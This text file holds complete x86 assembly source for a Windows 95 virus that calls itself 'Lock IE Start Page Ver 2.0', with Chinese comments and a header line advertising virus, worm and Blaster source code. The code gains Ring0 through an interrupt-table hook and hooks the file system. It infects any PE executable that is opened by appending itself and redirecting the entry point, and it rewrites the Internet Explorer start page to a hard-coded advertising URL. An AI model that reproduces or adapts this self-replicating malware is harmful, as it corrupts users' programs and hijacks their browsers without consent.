win95.lockiepage.878原代码 .txt

病毒源码 包括世上第一个病毒源码、蠕虫源码、冲击波源码

include win32v.inc 
extrn ExitProcess: proc 
.586p 
.model flat,stdcall 
.data 
@@Start: 
pushad 
push eax 
sidt [esp-2] ;保存Idt基地址 
pop esi ;弹出Idt基地址 
add esi,3*8 ;得到中断03的线形地址指针 
mov ecx,[esi] 
mov edx,[esi+4] ;保存中断03的线形地址 
call @@SetMyInt03 
@@MyInt03: ;我的中断03 Ring0程序 
pushad 
mov [esi],ecx 
mov [esi+4],edx ;恢复中断03的线形地址 
mov eax,dr3 ;我用dr3做病毒标志 
mov ecx,VirusFlag 
@@IsInstalled: 
cmp eax,ecx 
jz @@ExitHook 
mov dr3,ecx ;设置病毒标志 
call @@SetVxdCall ;填写VXDCALL指令（Int 20h） 
@@SetVxdCallOk: 
push eax 
push esp 
call @@PushPathNameAddr 
PathName db 'SoftWare\MicroSoft\Internet Explorer\Main',0 
@@PushPathNameAddr: 
push 80000001h 
@@RegOpenKey: 
int 20h ;打开注册表一个Key 
dd 00010148h ;VMMCall_RegOpenKey 
add esp,3*4 
pop ebp 
or eax,eax 
jnz short @@OpenRegKeyError 
push 040h 
call @@PushHttpNameAddr 
HttpName db 'http://202.115.16.8/~ekang',0 ;这是广告网页 
@@PushHttpNameAddr: 
push 01h 
push 00h 
call @@PushValueNameAddr 
ValueName db 'Start Page',0 
@@PushValueNameAddr: 
push ebp 
@@RegSetValueEx: 
int 20h ;设置IE Start Page页面为我的广告网址 
dd 00010152h ;VMMCall_RegSetValueEx 
add esp,6*4 
push ebp 
@@RegCloseKey: 
int 20h ;关闭注册表句柄 
dd 00010149h ;VMMCall_RegCloseKey 
add esp,1*4 
@@OpenRegKeyError: 
push L 0fh 
push L 00 
push L -1 
push L 00 
push L 00 
push L 00 
push L 01 
push L 02 
@@AllocPage: 
int 20h ;为病毒连接一个挂接页（大小=1000h) 
dd 00010053h ;VMMCall_AllocPage 
add esp,8*4 
or eax,eax 
jz short @@ExitHook ;连接失败 
mov edi,eax 
call @@GetVirusStartAddr 
@@GetVirusStartAddr: 
pop esi 
sub esi,OFF @@GetVirusStartAddr-OFF @@Start 
mov ecx,VirusSize 
cld 
rep movsb ;将病毒搬移到Ring0页内 
mov edi,eax 
add eax,OFF @@MyFileHookApi-OFF @@Start 
push eax 
@@HookFileApi: 
int 20h ;挂接文件系统 
dd 00400067h ;VMMCall_HookFileSystem 
add esp,04h 
mov [edi+OFF OldFileHookApi-@@Start],eax 
@@ClsOptFlag: 
xor eax,eax ;清除重入标志 
mov [edi.OFF OptFlag-OFF @@Start],eax 
@@ExitHook: 
popad 
iretd ;返回到Ring3继续，标号@@Ring3GoOn 
@@SetMyInt03: 
cli 
pop W[esi] 
pop W[esi+6] ;修改中断03的线形地址 
int 03 ;进入Ring0标号@@MyInt03 
@@Ring3GoNo: 
sti 
popad 
MoveToEax db 0b8h 
OldAppEntry dd OFF @@Exit 
jmp eax ;跳去执行原程序 
;IFSFileHookFunc(pIFSfn,nfn,nDrv,nRType,nCP,pir); 
@@MyFileHookApi: 
pushad 
mov ebp,esp 
push ds 
push es 
push ss 
pop ds 
push ss 
pop es ;设置数据段 
cmp D[ebp+(8+1+1)*4],36 ;是否打开文件调用？ 
jnz short @@OldFileHookApi 
call @@GetPathName 
@@OldFileHookApi: 
pop es 
pop ds 
popad 
JmpMem dw 25ffh ;跳到原文件挂接函数运行 
OldFileHookApi dd ? 
OptFlag dd 00h 
@@GetPathName: 
pop esi 
push esi ;Push Back Addr 
@@IsOptFlagSet: 
add esi,OFF OptFlag-OFF @@OldFileHookApi 
mov ecx,VirusFlag 
cmp [esi],ecx ;是否重入？ 
jz short @@RetOldHookApi 
@@SetOptFlag: 
mov [esi],ecx ;设置重入标志 
add esi,OFF FilePathBuffer-OFF OptFlag 
mov edi,esi 
mov eax,[ebp+(8+1+2)*4];Get nDriver(1=A;2=B,3=C...) 
add ax,':A'-1 
cld 
stosw ;构造Ansi路径名 
mov esi,[ebp+(8+1+5)*4];Get ioreq 
mov eax,[esi+0ch];Get UniCode PathName Addr 
add eax,04h 
push L 0 
push L 100h 
push eax 
push edi 
@@UniToBCSPath: 
Int 20h ;继续构造Ansi路径名 
dd 00400041h ;VMMCall_UniToBCSPath 
add esp,4*4 
or eax,eax 
jz short @@ClearOptFlag 
mov eax,[edi+eax-4] 
not eax 
cmp eax,not ('EXE.') ;是EXE文件吗？ 
jnz short @@ClearOptFlag 
call @@OptFile 
@@ClearOptFlag: 
pop esi 
push esi ;Push Back Addr 
add esi,OFF OptFlag-OFF @@OldFileHookApi 
xor eax,eax 
mov [esi],eax ;清除重入标志 
@@RetOldHookApi: 
ret 
@@OptFile: ;以下是修改PE文件，将病毒复在原文件尾 
mov esi,edi 
dec esi 
dec esi 
mov ebp,esi ;保存FilePathName地址在ebp中 
mov eax,4300h 
call @@FileIo ;IFSCall_FileIo 得到文件属性 
jc @@OpenFileFalse 
push ecx ;保存文件属性 
xor ecx,ecx 
mov eax,4301h 
call @@FileIo ;IFSCall_FileIo 将文件属性设为0 
xor eax,eax 
mov edx,eax 
inc edx 
mov ebx,edx 
inc ebx 
mov ax,0d500h 
call @@FileIo ;IFSCall_FileIo 打开文件 
pop ecx ;弹出文件属性 
pushfd ;保存标志 
push eax ;保存文件Ring0句柄 
mov eax,4301h 
call @@FileIo ;IFSCall_FileIo 设置文件属性，恢复文件属性 
pop ebx ;弹出文件Ring0句柄 
popfd 
jc @@OpenFileFalse 
@@GetReadFileBuffer: 
add esi,size FilePathBuffer 
mov ecx,size ReadFileBuffer 
xor edx,edx 
mov eax,0d600h ;IFSCall_FileIo 读文件 
call @@FileIo 
jc @@CloseFile 
cmp eax,ecx 
jnz @@CloseFile 
cmp word ptr [esi],'ZM' ;是Exe文件吗？ 
jnz @@CloseFile 
movzx eax,word ptr[esi+3ch] 
cmp eax,size ReadFileBuffer-200h 
ja @@CloseFile 
add esi,eax ;esi=Pe文件Pe头结构 
cmp [esi.fhPEFlag],'EP' ;是Pe文件吗？ 
jnz @@CloseFile 
cmp [esi.fhCheckSum],VirusFlag ;已经传染过了吗？ 
jz @@CloseFile 
mov [esi.fhCheckSum],VirusFlag ;设置感染标志 
@@SaveOldAppEntryRVA: 
mov eax,[esi.fhEntryRVA] 
add eax,[esi.fhImageBase] ;得到老文件入口线形地址 
mov [ebp+OFF OldAppEntry-OFF FilePathBuffer],eax 
movzx ecx,[esi.fhObjectCount] 
dec ecx 
mov eax,size ObjectTable 
mul ecx 
cmp eax,size ReadFileBuffer-200h 
ja short @@CloseFile 
lea edi,[esi.fhObjectTable00+eax] ;得到最后一块段表地址 
mov edx,[edi.otPhysOffset] 
add edx,[edi.otPhysSize] 
mov ecx,VirusSize 
push esi 
@@GetVirusBase: 
mov esi,ebp 
sub esi,OFF FilePathBuffer-OFF @@Start 
mov eax,0d601h 
call @@FileIo ;IFSCall_FileIo 写文件，将病毒写在最后一段的末尾 
pop esi 
jc short @@CloseFile 
@@SetNewEntryRVA: 
mov eax,[edi.otPhysSize] 
add eax,[edi.otRVA] 
mov [esi.fhEntryRVA],eax ;改变文件的入口RVA（相对虚拟地址） 
@@FixOtherHeaderVar: ;修改相关文件头变量 
add [edi.otPhysSize],ecx 
mov eax,[edi.otPhysSize] 
sub eax,[edi.otVirtSize] 
jb short @@VirtSizeIsBigger 
@@PhysSizeIsBigger: 
add [edi.otVirtSize],eax 
add [esi.fhImageSize],eax 
@@VirtSizeIsBigger: 
nop 
@@GetReadFileBuffer0: 
mov esi,ebp 
add esi,size FilePathBuffer 
@@WriteBackFileHeader: 
mov ecx,size ReadFileBuffer 
xor edx,edx 
mov eax,0d601h 
call @@FileIo ;IFSCall_FileIo 写文件，将文件头写回文件 
@@CloseFile: 
mov eax,0d700h 
call @@FileIo ;IFSCall_FileIo 关闭文件 
@@OpenFileFalse: 
ret 
@@FileIo: 
int 20h ;这里是IFSCall_FileIO子函数 
dd 00400032h 
ret 
@@SetVxdCall: ;以下是恢复VXDCALL（Int 20h)指令 
pop ebx 
push ebx 
mov ax,020cdh 
lea esi,[ebx+OFF @@VxdCallTable-@@SetVxdCallOk] 
cld 
lea edi,[ebx+OFF @@RegOpenKey-OFF @@SetVxdCallOk] 
stosw 
movsd 
lea edi,[ebx+OFF @@RegSetValueEx-OFF @@SetVxdCallOk] 
stosw 
movsd 
lea edi,[ebx+OFF @@RegCloseKey-OFF @@SetVxdCallOk] 
stosw 
movsd 
lea edi,[ebx+OFF @@AllocPage-OFF @@SetVxdCallOk] 
stosw 
movsd 
lea edi,[ebx+OFF @@HookFileApi-OFF @@SetVxdCallOk] 
stosw 
movsd 
lea edi,[ebx+OFF @@UniToBCSPath-OFF @@SetVxdCallOk] 
stosw 
movsd 
lea edi,[ebx+OFF @@FileIo-OFF @@SetVxdCallOk] 
stosw 
movsd 
ret 
@@VxdCallTable: ;VXD调用列表 
dd 00010148h ;VMMCall_RegOpenKey 
dd 00010152h ;VMMCall_RegSetValueEx 
dd 00010149h ;VMMCall_RegCloseKey 
dd 00010053h ;VMMCall_AllocPage 
dd 00400067h ;IFSCall_HookFileApi 
dd 00400041h ;IFSCall_UniToBCSPath 
dd 00400032h ;IFSCall_FileIo  
VirusMsg db 'Lock IE Start Page Ver 2.0,By Whg 2001.6.13',0 
@@VirusEnd: 
VirusSize=OFF @@VirusEnd-OFF @@Start 
VirusFlag=VirusSize 
FilePathBuffer db 100h dup(?) ;文件Ansi路径Buffer 
ReadFileBuffer db 900h dup(?) ;原PE文件数据Buffer 
.code 
@@Exit: 
call ExitProcess,L 0 
ends 
end @@Start